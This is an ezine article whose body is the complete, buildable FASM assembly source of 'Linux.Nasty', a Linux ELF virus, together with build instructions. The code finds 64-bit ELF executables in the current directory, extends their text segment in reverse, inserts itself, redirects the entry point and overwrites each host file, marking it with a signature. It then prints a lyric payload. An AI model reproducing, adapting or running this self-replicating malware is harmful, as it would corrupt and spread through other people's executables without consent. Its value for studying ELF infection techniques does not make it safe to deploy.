Copy Link
Add to Bookmark
Report

1.15 Linux.Nasty.asm

eZine's profile picture
Published in 
tmp0ut
 · 2 years ago

; Linux.Nasty 
; Written by TMZ (2021)
;
; This virus should be assembled with FASM x64 (tested with version 1.73.27 on Linux 5.11.14-gentoo).
; - relies on the Reverse Text Segment Infection technique where the segment is extended in reverse by PAGE_SIZE to make room for the virus.
; - this technique only works on regular ELF executables (does not work with PIE).
; - it is also not working on systems with huge pages enabled at this time.
; - PAGE_SIZE alignment should be calculated dynamically but this code assumes its value of 4096 for demonstration purposes.
; - infects current directory (non recursively).
; - entry point still resides in the .text segment, which is less suspicious.
;
; Assemble and add virus signature to first generation binary with:
; $ fasm Linux.Nasty.asm
; $ echo -n 544d5a00 | xxd -r -p -s +0x9 - Linux.Nasty
;
; Payload (non destructive) is just a message displayed to stdout.
;
; A big thanks for those who keeps the VX scene alive!
; Feel free to email me: tmz@null.net || tmz@syscall.sh || thomazi@linux.com
; @guitmz || @TMZvx
; https://www.guitmz.com
; https://syscall.sh
;
; Use at your own risk.
;
; References:
; https://web.archive.org/web/20210420163849/https://ivanlef0u.fr/repo/madchat/vxdevl/vdat/tuunix01.htm
; https://github.com/elfmaster/skeksi_virus
; https://github.com/NickStephens/elfit
;
; Stack buffer:
; r13 = target temp file fd
; r14 = target mmap addr
; r15 = STAT
; r15 + 150 = patched jmp to OEP
; r15 + 200 = DIRENT.d_name
; r15 + 500 = directory size
; r15 + 600 = DIRENT

format ELF64 executable 3

SYS_EXIT = 0x3c
SYS_OPEN = 0x2
SYS_CLOSE = 0x3
SYS_WRITE = 0x1
SYS_READ = 0x0
SYS_GETDENTS64 = 0xd9
SYS_FSTAT = 0x5
SYS_CREAT = 0x55
SYS_LSEEK = 0x8
SYS_MMAP = 0x9
SYS_MUNMAP = 0xb
SYS_SYNC = 0xa2
SYS_RENAME = 0x52
EHDR_SIZE = 0x40
ELFCLASS64 = 0x2
EM_X86_64 = 0x3e
O_RDONLY = 0x0
O_RDWR = 0x2
STDOUT = 0x1
SEEK_CUR = 0x1
DIRENT_BUFSIZE = 0x400
PAGE_SIZE = 0x1000
MAP_PRIVATE = 0x2

PROT_READ = 0x1
PROT_WRITE = 0x2
DT_REG = 0x8
PT_LOAD = 0x1
PF_X = 0x1
PF_R = 0x4

PAGE_SIZE equ PAGE_SIZE
V_SIZE equ v_stop - v_start

struc DIRENT {
.d_ino rq 1
.d_off rq 1
.d_reclen rw 1
.d_type rb 1
label .d_name byte
}
virtual at 0
DIRENT DIRENT
sizeof.DIRENT = $ - DIRENT
end virtual

struc STAT {
.st_dev rq 1
.st_ino rq 1
.st_nlink rq 1
.st_mode rd 1
.st_uid rd 1
.st_gid rd 1
.pad0 rb 4
.st_rdev rq 1
.st_size rq 1
.st_blksize rq 1
.st_blocks rq 1
.st_atime rq 1
.st_atime_nsec rq 1
.st_mtime rq 1
.st_mtime_nsec rq 1
.st_ctime rq 1
.st_ctime_nsec rq 1
}
virtual at 0
STAT STAT
sizeof.STAT = $ - STAT
end virtual

struc EHDR {
.magic rd 1
.class rb 1
.data rb 1
.elfversion rb 1
.os rb 1
.abiversion rb 1
.pad rb 7
.type rb 2
.machine rb 2
.version rb 4
.entry rq 1
.phoff rq 1
.shoff rq 1
.flags rb 4
.ehsize rb 2
.phentsize rb 2
.phnum rb 2
.shentsize rb 2
.shnum rb 2
.shstrndx rb 2
}
virtual at 0
EHDR EHDR
sizeof.EHDR = $ - EHDR
end virtual

struc PHDR {
.type rb 4
.flags rd 1
.offset rq 1
.vaddr rq 1
.paddr rq 1
.filesz rq 1
.memsz rq 1
.align rq 1
}
virtual at 0
PHDR PHDR
sizeof.PHDR = $ - PHDR
end virtual

struc SHDR {
.name rb 4
.type rb 4
.flags rq 1
.addr rq 1
.offset rq 1
.size rq 1
.link rb 4
.info rb 4
.addralign rq 1
.entsize rq 1
.hdr_size = $ - .name
}
virtual at 0
SHDR SHDR
sizeof.SHDR = $ - PHDR
end virtual

segment readable executable
entry v_start

v_start:
sub rsp, 2000 ; reserving 2000 bytes
mov r15, rsp ; r15 has the reserved stack buffer address

load_dir:
push "." ; pushing "." to stack (rsp)
mov rdi, rsp ; moving "." to rdi
mov rsi, O_RDONLY
xor rdx, rdx ; not using any flags
mov rax, SYS_OPEN
syscall ; rax contains the fd

mov r8, rax ; mov fd to r8 temporarily

mov rdi, rax ; move fd to rdi
lea rsi, [r15 + 600 + DIRENT] ; rsi = dirent in stack
mov rdx, DIRENT_BUFSIZE ; buffer with maximum directory size
mov rax, SYS_GETDENTS64
syscall

mov r9, rax ; r9 now contains the directory entries

mov rdi, r8 ; load open dir fd from r8
mov rax, SYS_CLOSE ; close source fd in rdi
syscall

test r9, r9 ; check directory list was successful
js cleanup ; if negative code is returned, I failed and should exit

mov qword [r15 + 500], r9 ; [r15 + 500] now holds directory size
xor rcx, rcx ; will be the position in the directory entries

file_loop:
push rcx ; preserving rcx (important, used as counter for dirent record length)
cmp [rcx + r15 + 600 + DIRENT.d_type], DT_REG ; check if it's a regular file dirent.d_type
jne .continue ; if not, proceed to next file

.open_target:
push rcx
lea rdi, [rcx + r15 + 600 + DIRENT.d_name] ; dirent.d_name from stack
mov rsi, O_RDWR ; opening target in read write mode
xor rdx, rdx ; not using any flags
mov rax, SYS_OPEN
syscall

test rax, rax ; if can't open file, try next one
js .continue ; this also kinda prevents self infection since you cannot open a running file in write mode (which will happen during first execution)

mov r8, rax ; load r8 with source fd from rax
xor rax, rax ; clearing rax, will be used to copy host filename to stack buffer

pop rcx
lea rsi, [rcx + r15 + 600 + DIRENT.d_name] ; put address into the source index
lea rdi, [r15 + 200] ; put address into the destination index (that is in stack buffer at [r15 + 200])

.copy_host_name:
mov al, [rsi] ; copy byte at address in rsi to al
inc rsi ; increment address in rsi
mov [rdi], al ; copy byte in al to address in rdi
inc rdi ; increment address in rdi
cmp al, 0 ; see if its an ascii zero
jne .copy_host_name ; jump back and read next byte if not

.map_target:
mov rdi, r8 ; load source fd to rdi
lea rsi, [r15 + STAT] ; load fstat struct to rsi
mov rax, SYS_FSTAT
syscall ; fstat struct in stack conntains target file information

xor rdi, rdi ; operating system will choose mapping destination
mov rsi, [r15 + STAT.st_size] ; load rsi with file size from fstat.st_size in stack
mov rdx, PROT_READ or PROT_WRITE ; protect RW = PROT_READ (0x01) | PROT_WRITE (0x02)
mov r10, MAP_PRIVATE ; pages will be private
xor r9, r9 ; offset inside source file (zero means start of source file)
mov rax, SYS_MMAP
syscall ; now rax will point to mapped location

push rax ; push mmap addr to stack
mov rdi, r8 ; rdi is now target fd
mov rax, SYS_CLOSE ; close source fd in rdi
syscall
pop rax ; restore mmap addr from stack

test rax, rax ; test if mmap was successful
js .continue ; skip file if not

.is_elf:
cmp [rax + EHDR.magic], 0x464c457f ; 0x464c457f means .ELF (dword, little-endian)
jnz .continue ; not an ELF binary, close and continue to next file if any

.is_64:
cmp [rax + EHDR.class], ELFCLASS64 ; check if target ELF is 64bit
jne .continue ; skipt it if not
cmp [rax + EHDR.machine], EM_X86_64 ; check if target ELF is x86_64 architechture
jne .continue ; skip it if not

.is_infected:
cmp dword [rax + EHDR.pad], 0x005a4d54 ; check signature in ehdr.pad (TMZ in little-endian, plus trailing zero to fill up a word size)
jz .continue ; already infected, close and continue to next file if any

.infection_candidate:
call infect ; calls infection routine

.continue:
pop rcx ; restore rcx, used as counter for directory length
add cx, [rcx + r15 + 600 + DIRENT.d_reclen] ; adding directory record length to cx (lower rcx, for word)
cmp rcx, qword [r15 + 500] ; comparing rcx counter with directory records total size
jne file_loop ; if counter is not the same, continue loop

call payload ; by calling payload label, we set msg label address on stack
msg:
db 0x4e, 0x61, 0x73, 0x74, 0x79, 0x20, 0x62, 0x79, 0x20, 0x54, 0x4d, 0x5a, 0x20, 0x28, 0x63, 0x29, 0x20, 0x32, 0x30, 0x32, 0x31, 0x0a, 0x0a
db 0x4e, 0x61, 0x73, 0x74, 0x79, 0x2c, 0x20, 0x6e, 0x61, 0x73, 0x74, 0x79, 0x0a
db 0x54, 0x72, 0x69, 0x70, 0x6c, 0x65, 0x20, 0x58, 0x20, 0x72, 0x61, 0x74, 0x65, 0x64, 0x0a
db 0x4e, 0x61, 0x73, 0x74, 0x79, 0x2c, 0x20, 0x6e, 0x61, 0x73, 0x74, 0x79, 0x0a
db 0x4a, 0x75, 0x73, 0x74, 0x69, 0x63, 0x65, 0x2c, 0x20, 0x61, 0x20, 0x77, 0x61, 0x73, 0x74, 0x65, 0x2d, 0x70, 0x69, 0x74, 0x0a
db 0x4e, 0x61, 0x73, 0x74, 0x79, 0x2c, 0x20, 0x6e, 0x61, 0x73, 0x74, 0x79, 0x0a
db 0x44, 0x65, 0x65, 0x70, 0x65, 0x72, 0x20, 0x69, 0x6e, 0x20, 0x74, 0x68, 0x65, 0x20, 0x64, 0x69, 0x72, 0x74, 0x0a
db 0x4e, 0x61, 0x73, 0x74, 0x79, 0x2c, 0x20, 0x6e, 0x61, 0x73, 0x74, 0x79, 0x0a
db 0x4d, 0x61, 0x6b, 0x69, 0x6e, 0x67, 0x20, 0x62, 0x6f, 0x64, 0x69, 0x65, 0x73, 0x20, 0x68, 0x75, 0x72, 0x74, 0x0a, 0x0a
len = $-msg

payload:
pop rsi ; gets msg address from stack into rsi
mov rax, SYS_WRITE
mov rdi, STDOUT ; display payload
mov rdx, len
syscall

jmp cleanup ; finishes execution

infect:
push rbp ; save the stack frame of the caller
mov rbp, rsp ; save the stack pointer

mov r14, rax ; r14 = pointer to target bytes (memory map address)
mov r9, [r14 + EHDR.phoff] ; set r9 to offset of PHDRs
mov r12, [r14 + EHDR.shoff] ; set r12 to offset of SHDRs

xor rbx, rbx ; initializing phdr loop counter in rbx
xor rcx, rcx ; initializing shdr loop counter in rdx

.loop_phdr:
cmp [r14 + r9 + PHDR.type], PT_LOAD ; check if phdr.type is PT_LOAD
jnz .not_txt_segment ; if not, patch it as needed

cmp [r14 + r9 + PHDR.flags], PF_R or PF_X ; check if PT_LOAD is text segment
jnz .not_txt_segment ; if not, patch it as needed

.txt_segment:
sub [r14 + r9 + PHDR.vaddr], 2 * PAGE_SIZE ; decrease p_vaddr by 2 times PAGE_SIZE
add [r14 + r9 + PHDR.filesz], 2 * PAGE_SIZE ; increase p_filesz by 2 times PAGE_SIZE
add [r14 + r9 + PHDR.memsz], 2 * PAGE_SIZE ; increase p_memsz by 2 times PAGE_SIZE
sub [r14 + r9 + PHDR.offset], PAGE_SIZE ; decrease p_offset by PAGE_SIZE
mov r8, [r14 + r9 + PHDR.vaddr] ; contains .text segment patched vaddr, will be used to patch entrypoint

jmp .next_phdr ; proceed to next phdr

.not_txt_segment:
add [r14 + r9 + PHDR.offset], PAGE_SIZE ; patching p_offset of phdrs that are not the .text segment (increase by PAGE_SIZE)

.next_phdr:
inc bx ; increase phdr bx counter
cmp bx, word [r14 + EHDR.phnum] ; check if we looped through all phdrs already
jge .loop_shdr ; exit loop if yes

add r9w, word [r14 + EHDR.phentsize] ; otherwise, add current ehdr.phentsize into r9w
jnz .loop_phdr ; read next phdr

.loop_shdr:
add [r14 + r12 + SHDR.offset], PAGE_SIZE ; increase shdr.offset by PAGE_SIZE

.next_shdr:
inc cx ; increase shdr cx counter
cmp cx, word [r14 + EHDR.shnum] ; check if we looped through all shdrs already
jge .create_temp_file ; exit loop if yes

add r12w, word [r14 + EHDR.shentsize] ; otherwise, add current ehdr.shentsize into r12w
jnz .loop_shdr ; read next shdr

.create_temp_file:
push 0
mov rax, 0x706d742e79746e2e ; pushing ".nty.tmp\0" to stack
push rax ; this will be the temporary file name, not great but it's for demonstration only

mov rdi, rsp
mov rsi, 755o ; -rw-r--r--
mov rax, SYS_CREAT ; creating temporary file
syscall

test rax, rax ; check if temporary file creation worked
js .infect_fail ; if negative code is returned, I failed and should exit

mov r13, rax ; r13 now contains temporary file fd

.patch_ehdr:
mov r10, [r14 + EHDR.entry] ; set host OEP to r10

add [r14 + EHDR.phoff], PAGE_SIZE ; increment ehdr->phoff by PAGE_SIZE
add [r14 + EHDR.shoff], PAGE_SIZE ; increment ehdr->shoff by PAGE_SIZE
mov dword [r14 + EHDR.pad], 0x005a4d54 ; add signature in ehdr.pad (TMZ in little-endian, plus trailing zero to fill up a word size)

add r8, EHDR_SIZE ; add EHDR size to r8 (patched .text segment vaddr)
mov [r14 + EHDR.entry], r8 ; set new EP to value of r8

mov rdi, r13 ; target fd from r13
mov rsi, r14 ; mmap *buff from r14
mov rdx, EHDR_SIZE ; sizeof ehdr
mov rax, SYS_WRITE ; write patched ehdr to target host
syscall

cmp rax, 0
jbe .infect_fail

.write_virus_body:
call .delta ; the age old trick
.delta:
pop rax
sub rax, .delta

mov rdi, r13 ; target temporary fd from r13
lea rsi, [rax + v_start] ; load *v_start
mov rdx, V_SIZE ; virus body size
mov rax, SYS_WRITE
syscall

cmp rax, 0
jbe .infect_fail

.write_patched_jmp:
mov byte [r15 + 150], 0x68 ; 68 xx xx xx xx c3 (this is the opcode for "push addr" and "ret")
mov dword [r15 + 151], r10d ; on the stack buffer, prepare the jmp to host EP instruction
mov byte [r15 + 155], 0xc3 ; this is the last thing to run after virus execution, before host takes control

mov rdi, r13 ; r9 contains fd
lea rsi, [r15 + 150] ; rsi = patched push/ret in stack buffer = [r15 + 150]
mov rdx, 6 ; size of push/ret
mov rax, SYS_WRITE
syscall

.write_everything_else:
mov rdi, r13 ; get temporary fd from r13
mov rsi, PAGE_SIZE
sub rsi, V_SIZE + 6 ; rsi = PAGE_SIZE + sizeof(push/ret)
mov rdx, SEEK_CUR
mov rax, SYS_LSEEK ; moves fd pointer to position right after PAGE_SIZE + 6 bytes
syscall

mov rdi, r13
lea rsi, [r14 + EHDR_SIZE] ; start from after ehdr on target host
mov rdx, [r15 + STAT.st_size] ; get size of host file from stack
sub rdx, EHDR_SIZE ; subtract EHDR size from it (since we already have written an EHDR)
mov rax, SYS_WRITE ; write rest of host file to temporary file
syscall

mov rax, SYS_SYNC ; commiting filesystem caches to disk
syscall

.end:
mov rdi, r14 ; gets mmap address from r14 into rdi
mov rsi, [r15 + STAT.st_size] ; gets size of host file from stack buffer
mov rax, SYS_MUNMAP ; unmapping memory buffer
syscall

mov rdi, r13 ; rdi is now temporary file fd
mov rax, SYS_CLOSE ; close temporary file fd
syscall

push 0
mov rax, 0x706d742e79746e2e ; pushing ".nty.tmp\0" to stack
push rax ; as you know by now, this should have been done in a better way :)

mov rdi, rsp ; get temporary file name from stack into rdi
lea rsi, [r15 + 200] ; sets rsi to the address of the host file name from stack buffer
mov rax, SYS_RENAME ; replace host file with temporary file (sort of like "mv tmp_file host_file")
syscall

mov rax, 0 ; infection seems to have worked, set rax to zero as marker
mov rsp, rbp ; restore the stack pointer
pop rbp ; restore the caller's stack frame
jmp .infect_ret ; returns with success

.infect_fail:
mov rax, 1 ; infection falied, set rax to 1 and as marker
.infect_ret:
ret

cleanup:
add rsp, 2000 ; restoring stack so host process can run normally, this also could use some improvement
xor rdx, rdx ; clearing rdx before giving control to host (rdx a function pointer that the application should register with atexit - from x64 ABI)

v_stop:
xor rdi, rdi ; exit code 0
mov rax, SYS_EXIT
syscall

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT